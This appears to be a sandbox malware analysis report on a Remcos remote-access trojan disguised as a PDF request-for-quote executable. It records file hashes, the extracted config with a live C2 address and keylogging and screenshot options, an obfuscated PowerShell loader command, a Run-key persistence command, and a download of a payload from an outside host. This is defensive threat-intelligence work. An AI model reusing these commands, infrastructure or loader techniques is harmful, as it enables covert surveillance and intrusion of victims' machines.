Analysis

  • max time kernel
    26s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    30/08/2024, 13:43 UTC

General

  • Target

    RFQ-278TR8-EGUY-PDF.exe

  • Size

    566KB

  • MD5

    da86655a0232359a727a091ace033894

  • SHA1

    c5ba96e3b7f3ca40364d93852c49810c9ced5d90

  • SHA256

    ef5e922e7e1dc762301001557f0132d702b9f927efca9f70c91fd719ea1652a2

  • SHA512

    a58e76d31ce56e8b007518923599c2cd8cd9ec419f5cb930e2fe429e1a28256490a599d32b04cee7ca921b1e48b8c326440eade966fde62ac882e32d0494a868

  • SSDEEP

    12288:/TYbpC/5wByfpr4t6ssVfKF34YDc7L8lkflIQB5YT07KchD8ISNq3H:/TYdg5wByfp0UVW4YVl2I+5nKchDxSN4

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45.95.169.175:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-W6BTEW

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe
    "C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized " $Bestikke=Get-Content 'C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn';$Slambassinernes=$Bestikke.SubString(53011,3);.$Slambassinernes($Bestikke)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
        "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1512
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2216

Network

  • flag-us
    DNS
    asjstudio.cl
    ImagingDevices.exe
    Remote address:
    8.8.8.8:53
    Request
    asjstudio.cl
    IN A
    Response
    asjstudio.cl
    IN A
    201.148.104.39
  • flag-us
    DNS
    asjstudio.cl
    ImagingDevices.exe
    Remote address:
    8.8.8.8:53
    Request
    asjstudio.cl
    IN A
  • flag-cl
    GET
    http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin
    ImagingDevices.exe
    Remote address:
    201.148.104.39:80
    Request
    GET /cXKaAfOrdfcYdKPug104.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: asjstudio.cl
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 30 Aug 2024 13:44:15 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade
    Last-Modified: Thu, 29 Aug 2024 08:59:18 GMT
    Accept-Ranges: bytes
    Content-Length: 494656
    Content-Type: application/octet-stream
  • 201.148.104.39:80
    http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin
    http
    ImagingDevices.exe
    9.1kB
    509.6kB
    189
    368

    HTTP Request

    GET http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin

    HTTP Response

    200
  • 8.8.8.8:53
    asjstudio.cl
    dns
    ImagingDevices.exe
    116 B
    74 B
    2
    1

    DNS Request

    asjstudio.cl

    DNS Request

    asjstudio.cl

    DNS Response

    201.148.104.39

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Ligestillingers.ini

    Filesize

    33B

    MD5

    d1146584cebab9c03dcaf52946f7a18c

    SHA1

    cd0452fef7a4ad38b8c70895a487ecac54430fc1

    SHA256

    630fb379230acf901b24a7e57cd31bd6b7a0b054e8e265b6f7ae6b7220cf41c2

    SHA512

    044f3c344e47cf298b69541c5337b767f0bcca3819caff7ad68f24da72bfe36cd5dc54261b07ff2c2338ea75873523fd29b97cb728f9dde6a0882d6855273092

  • C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Tffeldyrene.Svu

    Filesize

    313KB

    MD5

    4868e8f6d3c4a685c65a0af8b88e33a2

    SHA1

    076a7cce739a778df2088a77a2978f8f8bad2bad

    SHA256

    65ae30c7a987b8b3ebbc96969343ae59033c9817a3683ebb5ac999bed93cb2ab

    SHA512

    9eb1c07208756befa71fdcc29be30d4ea73e3d48a9828eeb78e1851a9e287220d3e2e55aef49cc0e3ad883ef4f427367b740fb21d65b7b0e4c9e3cd5479b2814

  • C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn

    Filesize

    51KB

    MD5

    bbb124a1a42a8499a391dafad534321c

    SHA1

    38143905e4011753b569f3b0a0e4ba4c90a3d02c

    SHA256

    fccbcb9907193676c4840c9ab08ecec0058b9e650efc4971dd0d92fd15b575b5

    SHA512

    01449caa6effed3f6502d5c980f9a5683d2eb99dc247d29dbb79c9737c8f59a6dc5ee787ba0ad75ab6ba2f3b8db048fd4cd76765c704b6ae76fe4e190f1b8669

  • memory/2576-158-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-159-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-160-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-157-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-162-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-156-0x0000000074671000-0x0000000074672000-memory.dmp

    Filesize

    4KB

  • memory/2576-164-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2576-165-0x0000000006850000-0x000000000B8E9000-memory.dmp

    Filesize

    80.6MB

  • memory/2576-166-0x0000000074670000-0x0000000074C1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2980-169-0x00000000009B0000-0x0000000001A12000-memory.dmp

    Filesize

    16.4MB

  • memory/2980-171-0x00000000009B0000-0x0000000001A12000-memory.dmp

    Filesize

    16.4MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.